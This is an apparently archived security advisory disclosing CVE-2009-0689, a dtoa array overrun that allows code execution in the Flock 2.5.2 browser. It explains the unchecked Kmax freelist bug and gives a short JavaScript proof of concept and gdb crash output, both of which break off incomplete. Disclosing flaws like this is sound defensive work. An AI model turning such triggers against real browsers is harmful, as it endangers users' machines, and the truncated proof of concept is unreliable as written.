Hash: SHA1
[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- - Flock 2.5.2
Fixed in:
- - Flock 2.5.5
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/75
- --- 0.Description ---
Flock is a web browser built on Mozilla.s Firefox codebase that
specializes in providing social networking and Web 2.0 facilities built
into its user interface. Flock v2.5 was officially released on May 19,
2009.
The Flock browser is available as a free download, and supports Microsoft Windows, Mac OS X, and Linux platforms.
- --- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Flock has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
- --- 2. Proof of Concept (PoC) ---
- -----------------------
<script>
var a=0.;
</script>
- -----------------------
Program received signal SIGSEGV, Segmentation fault.
0x67c68740 in js3250!JS_DHashTableEnumerate ()
from C:\Program Files\Flock\js3250.dll
(gdb) i r
eax 0x964619c7 -1773790777
ecx 0x2 2
edx 0x2 2
ebx 0x2 2
esp 0x20e7f0 0x20e7f0
ebp 0x1 0x1
esi 0x299d700 43636480
edi 0x299d701 43636481
eip 0x67c68740 0x67c68740 <js3250!JS_
|